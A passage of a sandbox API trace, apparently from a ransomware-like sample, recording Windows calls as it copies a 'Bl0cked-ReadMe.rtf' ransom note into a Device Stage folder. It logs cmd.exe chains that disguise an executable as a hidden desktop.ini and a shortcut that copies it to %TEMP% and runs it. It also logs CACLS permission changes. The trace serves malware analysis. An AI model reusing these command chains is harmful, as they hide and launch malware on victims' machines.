Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\", cchLength=0x58 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\DEVICE\\{113527A4-45D4-4B6F-B567-97838F1B04B0}\\") returned 0x58 [0147.274] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0147.274] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\DEVICE\\{113527A4-45D4-4B6F-B567-97838F1B04B0}\\", cchCount1=88, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 1 [0147.274] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0147.275] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0147.275] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0147.275] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{11352~1\\") returned 0x34 [0147.276] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0147.276] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0147.276] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{11352~1\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{11352~1\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x110, hThread=0x114, dwProcessId=0xbe0, dwThreadId=0xb24)) returned 1 [0147.281] CloseHandle (hObject=0x110) returned 1 [0147.281] CloseHandle (hObject=0x114) returned 1 [0147.281] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\bl0cked-readme.rtf")) returned 0xffffffff [0147.282] GetLastError () returned 0x2 [0147.282] CopyFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\bl0cked-readme.rtf"), bFailIfExists=0) returned 1 [0147.296] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\bl0cked-readme.rtf")) returned 0x20 [0147.296] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0147.296] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0147.296] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0147.296] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0147.296] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe") returned 0x36 [0147.297] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"[FROM_PATH]\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0x87 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"[FROM_PATH]\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0x87 [0147.297] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0147.297] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\", lpszShortPath=0x123027c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{11352~1\\") returned 0x34 [0147.297] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0xb2 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0xb2 [0147.297] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0147.297] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}", lpszShortPath=0x123003c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{11352~1") returned 0x33 [0147.298] CharUpperBuffW (in: lpsz="attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{11352~1\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{11352~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{11352~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{11352~1\\desktop.ini\" && attrib +h \"[TO_DIR]\"", cchLength=0x18a | out: lpsz="ATTRIB -R -S -H \"C:\\USERS\\ALLUSE~1\\MICROS~1\\DEVICE~1\\DEVICE\\{11352~1\\DESKTOP.INI\" & DEL /F /Q \"C:\\USERS\\ALLUSE~1\\MICROS~1\\DEVICE~1\\DEVICE\\{11352~1\\DESKTOP.INI\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"C:\\USERS\\ALLUSE~1\\MICROS~1\\DEVICE~1\\DEVICE\\{11352~1\\DESKTOP.INI\" && ATTRIB +H \"C:\\USERS\\ALLUSE~1\\MICROS~1\\DEVICE~1\\DEVICE\\{11352~1\\DESKTOP.INI\" && ATTRIB +H \"[TO_DIR]\"") returned 0x18a [0147.298] CharUpperBuffW (in: lpsz="[TO_DIR]", cchLength=0x8 | out: lpsz="[TO_DIR]") returned 0x8 [0147.298] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{11352~1\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{11352~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{11352~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{11352~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{11352~1\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb88*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb78 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{11352~1\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{11352~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{11352~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{11352~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\DEVICE~1\\Device\\{11352~1\"", lpProcessInformation=0x12fb78*(hProcess=0x114, hThread=0x110, dwProcessId=0xb74, dwThreadId=0xa5c)) returned 1 [0147.303] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0xffffffff) returned 0x0 [0147.930] CloseHandle (hObject=0x114) returned 1 [0147.930] CloseHandle (hObject=0x110) returned 1 [0147.930] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0147.930] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0147.930] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0147.930] GetTickCount () returned 0x2deca [0147.930] QueryPerformanceCounter (in: lpPerformanceCount=0x12fbfc | out: lpPerformanceCount=0x12fbfc*=20471964299) returned 1 [0147.930] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="w\x1dﯸ\x12萀\x1d") returned 1 [0147.930] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="6\x1dﯸ\x12萀\x1d") returned 1 [0147.931] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="A\x1dﯸ\x12萀\x1d") returned 1 [0147.931] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="b\x1dﯸ\x12萀\x1d") returned 1 [0147.931] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="R\x1dﯸ\x12萀\x1d") returned 1 [0147.931] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="s\x1dﯸ\x12萀\x1d") returned 1 [0147.931] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="J\x1dﯸ\x12萀\x1d") returned 1 [0147.931] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="q\x1dﯸ\x12萀\x1d") returned 1 [0147.931] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0147.931] CharUpperBuffW (in: lpsz="explorer.exe \"[DIR_NAME]\" & type \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x65 | out: lpsz="EXPLORER.EXE \"[DIR_NAME]\" & TYPE \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x65 [0147.931] CharUpperBuffW (in: lpsz="[DIR_NAME]", cchLength=0xa | out: lpsz="[DIR_NAME]") returned 0xa [0147.931] CharUpperBuffW (in: lpsz="explorer.exe \"{113527a4-45d4-4b6f-b567-97838f1b04b0}\" & type \"{113527a4-45d4-4b6f-b567-97838f1b04b0}\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x9d | out: lpsz="EXPLORER.EXE \"{113527A4-45D4-4B6F-B567-97838F1B04B0}\" & TYPE \"{113527A4-45D4-4B6F-B567-97838F1B04B0}\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x9d [0147.931] CharUpperBuffW (in: lpsz="[HID_NAME]", cchLength=0xa | out: lpsz="[HID_NAME]") returned 0xa [0147.931] CharUpperBuffW (in: lpsz="explorer.exe \"{113527a4-45d4-4b6f-b567-97838f1b04b0}\" & type \"{113527a4-45d4-4b6f-b567-97838f1b04b0}\\desktop.ini\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x9e | out: lpsz="EXPLORER.EXE \"{113527A4-45D4-4B6F-B567-97838F1B04B0}\" & TYPE \"{113527A4-45D4-4B6F-B567-97838F1B04B0}\\DESKTOP.INI\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x9e [0147.931] CharUpperBuffW (in: lpsz="[EXE_NAME]", cchLength=0xa | out: lpsz="[EXE_NAME]") returned 0xa [0147.931] CoInitialize (pvReserved=0x0) returned 0x0 [0147.931] CoCreateInstance (in: rclsid=0x4e06a4*(Data1=0x21401, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x5, riid=0x4b0dcc*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x12fc10 | out: ppv=0x12fc10*=0x1d3e18) returned 0x0 [0147.933] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d36fc*(Data1=0x214f9, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3df0) returned 0x0 [0147.933] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d370c*(Data1=0x10b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3dfc) returned 0x0 [0147.933] ShellLink:IShellLinkW:SetPath (This=0x1d3df0, pszFile="%SystemRoot%\\system32\\cmd.exe") returned 0x0 [0147.935] ShellLink:IShellLinkW:SetArguments (This=0x1d3df0, pszArgs="/C explorer.exe \"{113527a4-45d4-4b6f-b567-97838f1b04b0}\" & type \"{113527a4-45d4-4b6f-b567-97838f1b04b0}\\desktop.ini\" > \"%TEMP%\\w6AbRsJq.exe\" && \"%TEMP%\\w6AbRsJq.exe\"") returned 0x0 [0147.935] ShellLink:IShellLinkW:SetWorkingDirectory (This=0x1d3df0, pszDir="%CD%") returned 0x0 [0147.935] ShellLink:IShellLinkW:SetIconLocation (This=0x1d3df0, pszIconPath="%SystemRoot%\\system32\\shell32.dll", iIcon=3) returned 0x0 [0147.935] ShellLink:IShellLinkW:SetShowCmd (This=0x1d3df0, iShowCmd=7) returned 0x0 [0147.935] ShellLink:IPersistFile:Save (This=0x1d3dfc, pszFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}.lnk", fRemember=0) returned 0x0 [0147.945] ShellLink:IUnknown:Release (This=0x1d3dfc) returned 0x2 [0147.945] ShellLink:IUnknown:Release (This=0x1d3df0) returned 0x1 [0147.945] ShellLink:IUnknown:Release (This=0x1d3e18) returned 0x0 [0147.945] CoUninitialize () [0147.946] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0147.946] ReleaseMutex (hMutex=0xf8) returned 1 [0147.946] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0147.946] ReleaseMutex (hMutex=0xf8) returned 1 [0147.946] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0147.946] ReleaseMutex (hMutex=0xf8) returned 1 [0147.946] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0147.946] ReleaseMutex (hMutex=0xf8) returned 1 [0147.946] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0147.947] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png", lpFilePart=0x12eab4*="device.png") returned 0x62 [0147.947] GetLastError () returned 0x5 [0147.947] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xab58\x131\xed01\x12") returned 0x13 [0147.947] LocalFree (hMem=0x1c6cc8) returned 0x0 [0147.947] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0147.947] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0147.947] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0147.947] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0147.947] CharUpperBuffW (in: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"", cchLength=0x47 | out: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"") returned 0x47 [0147.947] CharUpperBuffW (in: lpsz="[FILENAME]", cchLength=0xa | out: lpsz="[FILENAME]") returned 0xa [0147.947] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fbb4*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fba4 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png\"", lpProcessInformation=0x12fba4*(hProcess=0x110, hThread=0x114, dwProcessId=0xa3c, dwThreadId=0xadc)) returned 1 [0147.949] WaitForSingleObject (hHandle=0x110, dwMilliseconds=0xffffffff) returned 0x0 [0148.471] CloseHandle (hObject=0x110) returned 1 [0148.471] CloseHandle (hObject=0x114) returned 1 [0148.471] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0148.471] ReleaseMutex (hMutex=0xf8) returned 1 [0148.472] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0148.472] ReleaseMutex (hMutex=0xf8) returned 1 [0148.472] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0148.472] ReleaseMutex (hMutex=0xf8) returned 1 [0148.472] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0148.472] ReleaseMutex (hMutex=0xf8) returned 1 [0148.472] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0148.472] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png", lpFilePart=0x12eab4*="device.png") returned 0x62 [0148.472] GetLastError () returned 0x5 [0148.472] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xadc8\x131\xed01\x12") returned 0x13 [0148.472] LocalFree (hMem=0x1c6cc8) returned 0x0 [0148.472] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0148.472] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0148.472] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0148.473] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0148.473] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\", cchLength=0x58 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\DEVICE\\{113527A4-45D4-4B6F-B567-97838F1B04B0}\\") returned 0x58 [0148.473] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\", cchLength=0x58 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\DEVICE\\{113527A4-45D4-4B6F-B567-97838F1B04B0}\\") returned 0x58 [0148.473] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\DEVICE\\{113527A4-45D4-4B6F-B567-97838F1B04B0}\\", cchCount1=88, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\DEVICE\\{113527A4-45D4-4B6F-B567-97838F1B04B0}\\", cchCount2=88) returned 2 [0148.473] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0148.473] ReleaseMutex (hMutex=0xf8) returned 1 [0148.473] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0148.473] ReleaseMutex (hMutex=0xf8) returned 1 [0148.473] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0148.473] ReleaseMutex (hMutex=0xf8) returned 1 [0148.473] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0148.473] ReleaseMutex (hMutex=0xf8) returned 1 [0148.473] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0148.473] GetFullPathNameW (in: 